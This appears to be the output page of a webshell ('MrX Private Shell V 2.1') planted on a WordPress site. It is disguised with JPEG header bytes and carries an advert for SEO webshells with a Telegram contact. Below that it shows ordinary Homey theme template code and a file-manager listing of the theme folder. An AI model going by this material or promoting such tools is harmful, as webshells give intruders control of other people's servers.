����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
*/
get_header();
global $post, $experience_founds, $experience_view;
$sticky_sidebar = homey_option('sticky_sidebar');
$taxonomy_sidebar = homey_option('taxonomy_layout');
$taxonomy_layout = homey_option('taxonomy_posts_layout');
$taxonomy_num_posts = homey_option('taxonomy_num_posts');
$full_width_class ='';
if($taxonomy_sidebar == 'no-sidebar') {
$content_classes = 'col-xs-12 col-sm-12 col-md-12 col-lg-12';
$full_width_class = 'listing-page-full-width';
} elseif($taxonomy_sidebar == 'right-sidebar') {
$content_classes = 'col-xs-12 col-sm-12 col-md-8 col-lg-8';
$sidebar_classes = 'col-xs-12 col-sm-12 col-md-4 col-lg-4';
$sec_class = "right-sidebar";
} elseif($taxonomy_sidebar == 'left-sidebar') {
$content_classes = 'col-xs-12 col-sm-12 col-md-8 col-lg-8 col-md-push-4 col-lg-push-4';
$sidebar_classes = 'col-xs-12 col-sm-12 col-md-4 col-lg-4 col-md-pull-8 col-lg-pull-8';
$sec_class = "left-sidebar";
}
$number_of_experiences = 9;
$number_of_prop = $taxonomy_num_posts;
if(!$number_of_prop){
$number_of_prop = 9;
}
$sort_args = array('posts_per_page' => $number_of_prop, 'post_status' => 'publish');
$sort_args = homey_experience_sort($sort_args);
global $wp_query;
$args = array_merge( $wp_query->query_vars, $sort_args );
$wp_query = new WP_Query( $args );
?>
<section class="main-content-area listing-page <?php echo $full_width_class; ?>">
<div class="container">
<div class="row">
<div class="col-xs-12 col-sm-9 col-md-9 col-lg-9">
<div class="page-title">
<div class="block-top-title">
<h1 class="listing-title">
<?php echo post_type_archive_title(); ?>
</h1>
</div><!-- block-top-title -->
</div><!-- page-title -->
</div>
<div class="col-xs-12 col-sm-3 col-md-3 col-lg-3 hidden-xs">
<?php get_template_part('template-parts/experience/layout-tool'); ?>
</div>
</div><!-- .row -->
</div><!-- .container -->
<div class="container">
<div class="row">
<div class="<?php echo esc_attr($content_classes); ?>">
<?php if ( $wp_query->have_posts() ) : $experience_founds = $wp_query->found_posts; ?>
<?php get_template_part('template-parts/experience/sort-tool'); ?>
<div class="listing-wrap which-layout-<?php echo $taxonomy_layout;?> <?php if(str_contains($taxonomy_layout, '2')){ echo 'item-'.grid_list_or_card($taxonomy_layout, 1).'-view'; } ?> item-<?php echo esc_attr($taxonomy_layout);?>-view">
<div class="row">
<?php
while ( $wp_query->have_posts() ) : $wp_query->the_post();
if($taxonomy_layout == 'card') {
get_template_part('template-parts/experience/experience-card');
}elseif($taxonomy_layout == 'grid-v2' || $taxonomy_layout == 'list-v2') {
get_template_part('template-parts/experience/experience-item-v2');
} else {
get_template_part('template-parts/experience/experience-item');
}
endwhile;
?>
</div>
<!--start Pagination-->
<?php homey_pagination( $wp_query->max_num_pages, $range = 2 ); wp_reset_postdata(); ?>
<!--start Pagination-->
</div><!-- listing-wrap -->
<?php
else:
get_template_part('template-parts/experience/experience-none');
endif;
?>
</div>
<?php if($taxonomy_sidebar != 'no-sidebar') { ?>
<div class="<?php echo esc_attr($sidebar_classes); if( $sticky_sidebar['experience_sidebar'] > 0 ){ echo ' homey_sticky'; }?>">
<div class="sidebar <?php echo esc_attr($sec_class); ?>">
<?php get_sidebar('experience'); ?>
</div>
</div>
<?php } ?>
</div><!-- .row -->
</div> <!-- .container -->
</section><!-- main-content-area listing-page grid-listing-page -->
<?php get_footer();?>| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| css | Folder | 0755 |
|
|
| fonts | Folder | 0755 |
|
|
| framework | Folder | 0755 |
|
|
| images | Folder | 0755 |
|
|
| img | Folder | 0755 |
|
|
| inc | Folder | 0755 |
|
|
| js | Folder | 0755 |
|
|
| languages | Folder | 0755 |
|
|
| single-experience | Folder | 0755 |
|
|
| single-listing | Folder | 0755 |
|
|
| single-post | Folder | 0755 |
|
|
| template | Folder | 0755 |
|
|
| template-parts | Folder | 0755 |
|
|
| vc_templates | Folder | 0755 |
|
|
| woocommerce | Folder | 0755 |
|
|
| .DS_Store | File | 6 KB | 0644 |
|
| 404.php | File | 1.23 KB | 0644 |
|
| archive-experience.php | File | 4.34 KB | 0644 |
|
| archive-hm_homey_memberships.php | File | 2.05 KB | 0644 |
|
| archive-listing.php | File | 4.22 KB | 0644 |
|
| archive.php | File | 2.16 KB | 0644 |
|
| author.php | File | 369 B | 0644 |
|
| comments.php | File | 2.85 KB | 0644 |
|
| content-grid.php | File | 1.54 KB | 0644 |
|
| content-list.php | File | 899 B | 0644 |
|
| content-none.php | File | 1.39 KB | 0644 |
|
| content-page.php | File | 968 B | 0644 |
|
| content.php | File | 1.42 KB | 0644 |
|
| custom_periods_auto_renewl_for_next_year.php | File | 10.26 KB | 0644 |
|
| footer.php | File | 2.12 KB | 0644 |
|
| functions.php | File | 86.62 KB | 0644 |
|
| header.php | File | 5.38 KB | 0644 |
|
| index.php | File | 1.92 KB | 0644 |
|
| localization.php | File | 42.9 KB | 0644 |
|
| page.php | File | 2.64 KB | 0644 |
|
| screenshot.png | File | 282.37 KB | 0644 |
|
| search.php | File | 1.92 KB | 0644 |
|
| searchform.php | File | 320 B | 0644 |
|
| sidebar-experience.php | File | 654 B | 0644 |
|
| sidebar-listing.php | File | 640 B | 0644 |
|
| sidebar.php | File | 649 B | 0644 |
|
| single-experience.php | File | 2.21 KB | 0644 |
|
| single-hm_homey_memberships.php | File | 41.63 KB | 0644 |
|
| single-listing.php | File | 3.47 KB | 0644 |
|
| single.php | File | 5.63 KB | 0644 |
|
| style.css | File | 8.02 KB | 0644 |
|
| taxonomy-experience_amenity.php | File | 216 B | 0644 |
|
| taxonomy-experience_area.php | File | 209 B | 0644 |
|
| taxonomy-experience_city.php | File | 209 B | 0644 |
|
| taxonomy-experience_country.php | File | 209 B | 0644 |
|
| taxonomy-experience_facility.php | File | 209 B | 0644 |
|
| taxonomy-experience_language.php | File | 209 B | 0644 |
|
| taxonomy-experience_state.php | File | 209 B | 0644 |
|
| taxonomy-experience_type.php | File | 209 B | 0644 |
|
| taxonomy-listing_amenity.php | File | 215 B | 0644 |
|
| taxonomy-listing_area.php | File | 215 B | 0644 |
|
| taxonomy-listing_city.php | File | 215 B | 0644 |
|
| taxonomy-listing_country.php | File | 215 B | 0644 |
|
| taxonomy-listing_facility.php | File | 215 B | 0644 |
|
| taxonomy-listing_state.php | File | 215 B | 0644 |
|
| taxonomy-listing_type.php | File | 215 B | 0644 |
|
| taxonomy-room_type.php | File | 215 B | 0644 |
|
| wpml-config.xml | File | 15.61 KB | 0644 |
|